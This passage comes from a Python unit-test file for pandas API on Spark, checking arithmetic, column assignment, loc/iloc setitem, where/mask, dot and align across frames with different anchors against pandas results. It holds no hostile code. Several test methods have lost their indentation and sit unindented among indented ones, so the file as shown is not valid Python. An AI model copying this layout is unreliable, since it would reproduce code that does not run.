                    [("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
                ),
            )
            psser2 = ps.Series(
                [2, 2, 3, 4, 1],
                index=pd.MultiIndex.from_tuples(
                    [("a", "x"), ("b", "y"), ("c", "a"), ("x", "k"), ("q", "l")]
                ),
            )
            psser1.compare(psser2)
    def test_different_columns(self):
        """Adding frames with completely disjoint columns (flat and MultiIndex)."""
        psdf1 = self.psdf1
        psdf4 = self.psdf4
        pdf1 = self.pdf1
        pdf4 = self.pdf4
        self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        pdf1.columns = columns
        columns = pd.MultiIndex.from_tuples([("z", "e"), ("z", "f")])
        psdf4.columns = columns
        pdf4.columns = columns
        self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
    def test_assignment_series(self):
        """Assigning a column from a Series anchored to another DataFrame."""
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        # capture the column before assignment; it must remain unchanged below
        psser = psdf.a
        pser = pdf.a
        psdf["a"] = self.psdf2.a
        pdf["a"] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf["a"] = self.psdf2.b
        pdf["a"] = self.pdf2.b
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)
        # assigning a new column
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf["c"] = self.psdf2.a
        pdf["c"] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Multi-index columns
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf.columns = columns
        pdf.columns = columns
        psdf[("y", "c")] = self.psdf2.a
        pdf[("y", "c")] = self.pdf2.a
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # frame whose index is also kept as a column
        pdf = pd.DataFrame({"a": [1, 2, 3], "Koalas": [0, 1, 2]}).set_index("Koalas", drop=False)
        psdf = ps.from_pandas(pdf)
        psdf.index.name = None
        psdf["NEW"] = ps.Series([100, 200, 300])
        pdf.index.name = None
        pdf["NEW"] = pd.Series([100, 200, 300])
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_assignment_frame(self):
        """Assigning a whole DataFrame (from a different anchor) to column lists."""
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        # Replace both existing columns; the extracted Series must be unchanged.
        psdf[["a", "b"]] = self.psdf1
        pdf[["a", "b"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)
        # 'c' does not exist in `psdf`.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psser = psdf.a
        pser = pdf.a
        psdf[["b", "c"]] = self.psdf1
        pdf[["b", "c"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        self.assert_eq(psser, pser)
        # 'c' and 'd' do not exist in `psdf`.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf[["c", "d"]] = self.psdf1
        pdf[["c", "d"]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Multi-index columns
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf.columns = columns
        pdf.columns = columns
        psdf[[("y", "c"), ("z", "d")]] = self.psdf1
        pdf[[("y", "c"), ("z", "d")]] = self.pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Flat-label assignment from a frame that itself has MultiIndex columns.
        psdf = ps.from_pandas(self.pdf1)
        pdf = self.pdf1
        psdf1 = ps.from_pandas(self.pdf1)
        pdf1 = self.pdf1
        psdf1.columns = columns
        pdf1.columns = columns
        psdf[["c", "d"]] = psdf1
        pdf[["c", "d"]] = pdf1
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_series_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf["a"] = self.psdf1.a
pdf["a"] = self.pdf1.a
psdf["a"] = self.psdf2.b
pdf["a"] = self.pdf2.b
psdf["d"] = self.psdf3.c
pdf["d"] = self.pdf3.c
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_frame_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf[["a", "b"]] = self.psdf1
pdf[["a", "b"]] = self.pdf1
psdf[["e", "f"]] = self.psdf3
pdf[["e", "f"]] = self.pdf3
psdf[["b", "c"]] = self.psdf2
pdf[["b", "c"]] = self.pdf2
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_multi_index_arithmetic(self):
psdf5 = self.psdf5
psdf6 = self.psdf6
pdf5 = self.pdf5
pdf6 = self.pdf6
# Series
self.assert_eq((psdf5.c - psdf6.e).sort_index(), (pdf5.c - pdf6.e).sort_index())
self.assert_eq((psdf5["c"] / psdf6["e"]).sort_index(), (pdf5["c"] / pdf6["e"]).sort_index())
# DataFrame
self.assert_eq((psdf5 + psdf6).sort_index(), (pdf5 + pdf6).sort_index(), almost=True)
    def test_multi_index_assignment_series(self):
        """Column assignment from a Series when both sides use a MultiIndex."""
        # New column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["x"] = self.psdf6.e
        pdf["x"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # New column whose name matches the source Series.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["e"] = self.psdf6.e
        pdf["e"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Overwrite an existing column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf["c"] = self.psdf6.e
        pdf["c"] = self.pdf6.e
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_multi_index_assignment_frame(self):
        """Column-list assignment from a frame when both sides use a MultiIndex."""
        # Overwrite an existing column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf[["c"]] = self.psdf5
        pdf[["c"]] = self.pdf5
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Create a new column.
        psdf = ps.from_pandas(self.pdf5)
        pdf = self.pdf5
        psdf[["x"]] = self.psdf5
        pdf[["x"]] = self.pdf5
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
        # Create two new columns from a two-column source.
        psdf = ps.from_pandas(self.pdf6)
        pdf = self.pdf6
        psdf[["x", "y"]] = self.psdf6
        pdf[["x", "y"]] = self.pdf6
        self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_frame_loc_setitem(self):
        """DataFrame.loc setitem with indexers/values anchored to another frame."""
        pdf_orig = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf_orig = ps.DataFrame(pdf_orig)
        # Label-list rows, value from another anchor.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        another_psdf = ps.DataFrame(pdf_orig)
        psdf.loc[["viper", "sidewinder"], ["shield"]] = -another_psdf.max_speed
        pdf.loc[["viper", "sidewinder"], ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        # Pre-extracted Series must not observe the in-place update.
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)
        # Boolean mask from another anchor, value from self.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
        pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)
        # Both mask and value from another anchor.
        pdf = pdf_orig.copy()
        psdf = psdf_orig.copy()
        pser1 = pdf.max_speed
        pser2 = pdf.shield
        psser1 = psdf.max_speed
        psser2 = psdf.shield
        psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
        pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        self.assert_eq(psser1, pser1)
        self.assert_eq(psser2, pser2)
    def test_frame_iloc_setitem(self):
        """DataFrame.iloc setitem with a value Series from a different anchor."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        psdf.iloc[[0, 1, 2], 1] = -another_psdf.max_speed
        pdf.iloc[[0, 1, 2], 1] = -pdf.max_speed
        self.assert_eq(psdf, pdf)
        # A shorter positional indexer than the value Series must raise.
        with self.assertRaisesRegex(
            ValueError,
            "shape mismatch",
        ):
            psdf.iloc[[1, 2], [1]] = -another_psdf.max_speed
        psdf.iloc[[0, 1, 2], 1] = 10 * another_psdf.max_speed
        pdf.iloc[[0, 1, 2], 1] = 10 * pdf.max_speed
        self.assert_eq(psdf, pdf)
        with self.assertRaisesRegex(ValueError, "shape mismatch"):
            psdf.iloc[[0], 1] = 10 * another_psdf.max_speed
def test_series_loc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.loc[psser % 2 == 1] = -psser_another
pser.loc[pser % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser_another
pser.loc[pser_another % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[["viper", "sidewinder"]] = -psser_another
pser.loc[["viper", "sidewinder"]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = 10
pser.loc[pser_another % 2 == 1] = 10
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
def test_series_iloc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser1 = pser + 1
psser1 = psser + 1
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.iloc[[0, 1, 2]] = -psser_another
pser.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[1, 2]] = -psser_another
psser.iloc[[0, 1, 2]] = 10 * psser_another
pser.iloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[0]] = 10 * psser_another
psser1.iloc[[0, 1, 2]] = -psser_another
pser1.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser1, pser1)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser1.iloc[[1, 2]] = -psser_another
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
piloc = pser.iloc
kiloc = psser.iloc
kiloc[[0, 1, 2]] = -psser_another
piloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[1, 2]] = -psser_another
kiloc[[0, 1, 2]] = 10 * psser_another
piloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[0]] = 10 * psser_another
def test_update(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [10, 20, 30]})
psdf = ps.from_pandas(pdf)
pser = pdf.x
psser = psdf.x
pser.update(pd.Series([4, 5, 6]))
psser.update(ps.Series([4, 5, 6]))
self.assert_eq(psser.sort_index(), pser.sort_index())
self.assert_eq(psdf.sort_index(), pdf.sort_index())
    def test_where(self):
        """DataFrame.where with a boolean condition built from another frame."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.where(pdf2 < -250), psdf1.where(psdf2 < -250).sort_index())
        # multi-index columns
        pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame(
            {("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
        )
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
    def test_mask(self):
        """DataFrame.mask with a boolean condition built from another frame."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.mask(pdf2 > -250), psdf1.mask(psdf2 > -250).sort_index())
        # multi-index columns
        pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame(
            {("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
        )
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
    def test_multi_index_column_assignment_frame(self):
        """Assignment into a frame with MultiIndex columns from other anchors."""
        pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
        pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("a", "y")])
        psdf = ps.DataFrame(pdf)
        # Scalar label; the Series name (or lack of one) must not leak in.
        psdf["c"] = ps.Series([10, 20, 30, 20])
        pdf["c"] = pd.Series([10, 20, 30, 20])
        psdf[("d", "x")] = ps.Series([100, 200, 300, 200], name="1")
        pdf[("d", "x")] = pd.Series([100, 200, 300, 200], name="1")
        psdf[("d", "y")] = ps.Series([1000, 2000, 3000, 2000], name=("1", "2"))
        pdf[("d", "y")] = pd.Series([1000, 2000, 3000, 2000], name=("1", "2"))
        psdf["e"] = ps.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
        pdf["e"] = pd.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
        # Two-column assignment from a plain-column frame.
        psdf[[("f", "x"), ("f", "y")]] = ps.DataFrame(
            {"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
        )
        pdf[[("f", "x"), ("f", "y")]] = pd.DataFrame(
            {"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
        )
        self.assert_eq(repr(psdf.sort_index()), repr(pdf))
        # A key deeper than the column MultiIndex must raise.
        with self.assertRaisesRegex(KeyError, "Key length \\(3\\) exceeds index depth \\(2\\)"):
            psdf[("1", "2", "3")] = ps.Series([100, 200, 300, 200])
    def test_series_dot(self):
        """Series.dot against Series/DataFrames anchored to other frames."""
        pser = pd.Series([90, 91, 85], index=[2, 4, 1])
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([90, 91, 85], index=[2, 4, 1])
        psser_other = ps.from_pandas(pser_other)
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        # Same labels, different order.
        psser_other = ps.Series([90, 91, 85], index=[1, 2, 4])
        pser_other = pd.Series([90, 91, 85], index=[1, 2, 4])
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        # length of index is different
        psser_other = ps.Series([90, 91, 85, 100], index=[2, 4, 1, 0])
        with self.assertRaisesRegex(ValueError, "matrices are not aligned"):
            psser.dot(psser_other)
        # for MultiIndex
        midx = pd.MultiIndex(
            [["lama", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
        )
        pser = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([-450, 20, 12, -30, -250, 15, -320, 100, 3], index=midx)
        psser_other = ps.from_pandas(pser_other)
        self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
        pser = pd.Series([0, 1, 2, 3])
        psser = ps.from_pandas(pser)
        # DataFrame "other" without Index/MultiIndex as columns
        pdf = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # DataFrame "other" with Index as columns
        pdf.columns = pd.Index(["x", "y"])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        pdf.columns = pd.Index(["x", "y"], name="cols_name")
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # Row order should not matter after alignment.
        pdf = pdf.reindex([1, 0, 2, 3])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # DataFrame "other" with MultiIndex as columns
        pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("b", "y")])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        pdf.columns = pd.MultiIndex.from_tuples(
            [("a", "x"), ("b", "y")], names=["cols_name1", "cols_name2"]
        )
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
        # Series and DataFrame created on different anchors.
        psser = ps.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}).b
        pser = psser.to_pandas()
        psdf = ps.DataFrame({"c": [7, 8, 9]})
        pdf = psdf.to_pandas()
        self.assert_eq(psser.dot(psdf), pser.dot(pdf))
    def test_frame_dot(self):
        """DataFrame.dot against a Series from a different anchor."""
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
        psdf = ps.from_pandas(pdf)
        pser = pd.Series([1, 1, 2, 1])
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # Index reorder
        pser = pser.reindex([1, 0, 2, 3])
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # ser with name
        pser.name = "ser"
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with MultiIndex as column (ser with MultiIndex)
        arrays = [[1, 1, 2, 2], ["red", "blue", "red", "blue"]]
        pidx = pd.MultiIndex.from_arrays(arrays, names=("number", "color"))
        pser = pd.Series([1, 1, 2, 1], index=pidx)
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
        psdf = ps.from_pandas(pdf)
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with Index as column (ser with Index)
        pidx = pd.Index([1, 2, 3, 4], name="number")
        pser = pd.Series([1, 1, 2, 1], index=pidx)
        pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
        psdf = ps.from_pandas(pdf)
        psser = ps.from_pandas(pser)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with Index
        pdf.index = pd.Index(["x", "y"], name="char")
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # df with MultiIndex
        pdf.index = pd.MultiIndex.from_arrays([[1, 1], ["red", "blue"]], names=("number", "color"))
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psser), pdf.dot(pser))
        # Self-dot and dot with derived operands.
        pdf = pd.DataFrame([[1, 2], [3, 4]])
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.dot(psdf[0]), pdf.dot(pdf[0]))
        self.assert_eq(psdf.dot(psdf[0] * 10), pdf.dot(pdf[0] * 10))
        self.assert_eq((psdf + 1).dot(psdf[0] * 10), (pdf + 1).dot(pdf[0] * 10))
def test_to_series_comparison(self):
psidx1 = ps.Index([1, 2, 3, 4, 5])
psidx2 = ps.Index([1, 2, 3, 4, 5])
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
psidx1.name = "koalas"
psidx2.name = "koalas"
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
def test_series_repeat(self):
pser1 = pd.Series(["a", "b", "c"], name="a")
pser2 = pd.Series([10, 20, 30], name="rep")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(psser1.repeat(psser2).sort_index(), pser1.repeat(pser2).sort_index())
    def test_series_ops(self):
        """Arithmetic mixing Series and Index objects from different anchors."""
        pser1 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
        pser2 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
        pidx1 = pd.Index([10, 11, 12, 13, 14, 15, 16], name="x")
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        psidx1 = ps.from_pandas(pidx1)
        # Series-with-Series, covering all named/unnamed combinations.
        self.assert_eq(
            (psser1 + 1 + 10 * psser2).sort_index(), (pser1 + 1 + 10 * pser2).sort_index()
        )
        self.assert_eq(
            (psser1 + 1 + 10 * psser2.rename()).sort_index(),
            (pser1 + 1 + 10 * pser2.rename()).sort_index(),
        )
        self.assert_eq(
            (psser1.rename() + 1 + 10 * psser2).sort_index(),
            (pser1.rename() + 1 + 10 * pser2).sort_index(),
        )
        self.assert_eq(
            (psser1.rename() + 1 + 10 * psser2.rename()).sort_index(),
            (pser1.rename() + 1 + 10 * pser2.rename()).sort_index(),
        )
        # Series-with-Index in both operand orders.
        self.assert_eq(psser1 + 1 + 10 * psidx1, pser1 + 1 + 10 * pidx1)
        self.assert_eq(psser1.rename() + 1 + 10 * psidx1, pser1.rename() + 1 + 10 * pidx1)
        self.assert_eq(psser1 + 1 + 10 * psidx1.rename(None), pser1 + 1 + 10 * pidx1.rename(None))
        self.assert_eq(
            psser1.rename() + 1 + 10 * psidx1.rename(None),
            pser1.rename() + 1 + 10 * pidx1.rename(None),
        )
        self.assert_eq(psidx1 + 1 + 10 * psser1, pidx1 + 1 + 10 * pser1)
        self.assert_eq(psidx1 + 1 + 10 * psser1.rename(), pidx1 + 1 + 10 * pser1.rename())
        self.assert_eq(psidx1.rename(None) + 1 + 10 * psser1, pidx1.rename(None) + 1 + 10 * pser1)
        self.assert_eq(
            psidx1.rename(None) + 1 + 10 * psser1.rename(),
            pidx1.rename(None) + 1 + 10 * pser1.rename(),
        )
        # Mismatched lengths must raise in either operand order.
        pidx2 = pd.Index([11, 12, 13])
        psidx2 = ps.from_pandas(pidx2)
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psser1 + psidx2
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psidx2 + psser1
    def test_index_ops(self):
        """Arithmetic between Index objects from different anchors."""
        pidx1 = pd.Index([1, 2, 3, 4, 5], name="x")
        pidx2 = pd.Index([6, 7, 8, 9, 10], name="x")
        psidx1 = ps.from_pandas(pidx1)
        psidx2 = ps.from_pandas(pidx2)
        self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
        self.assert_eq(psidx1.rename(None) * 10 + psidx2, pidx1.rename(None) * 10 + pidx2)
        # Result-name semantics for mixed named/unnamed changed in pandas 1.0.
        if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
            self.assert_eq(psidx1 * 10 + psidx2.rename(None), pidx1 * 10 + pidx2.rename(None))
        else:
            self.assert_eq(
                psidx1 * 10 + psidx2.rename(None), (pidx1 * 10 + pidx2.rename(None)).rename(None)
            )
        # Mismatched lengths must raise.
        pidx3 = pd.Index([11, 12, 13])
        psidx3 = ps.from_pandas(pidx3)
        with self.assertRaisesRegex(
            ValueError, "operands could not be broadcast together with shapes"
        ):
            psidx1 + psidx3
        # Indexes with different names.
        pidx1 = pd.Index([1, 2, 3, 4, 5], name="a")
        pidx2 = pd.Index([6, 7, 8, 9, 10], name="a")
        pidx3 = pd.Index([11, 12, 13, 14, 15], name="x")
        psidx1 = ps.from_pandas(pidx1)
        psidx2 = ps.from_pandas(pidx2)
        psidx3 = ps.from_pandas(pidx3)
        self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
        if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
            self.assert_eq(psidx1 * 10 + psidx3, pidx1 * 10 + pidx3)
        else:
            self.assert_eq(psidx1 * 10 + psidx3, (pidx1 * 10 + pidx3).rename(None))
    def test_align(self):
        """align between frames/series from different anchors, all join types."""
        pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
        pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        # DataFrame-with-DataFrame for every join and supported axis.
        for join in ["outer", "inner", "left", "right"]:
            for axis in [None, 0]:
                psdf_l, psdf_r = psdf1.align(psdf2, join=join, axis=axis)
                pdf_l, pdf_r = pdf1.align(pdf2, join=join, axis=axis)
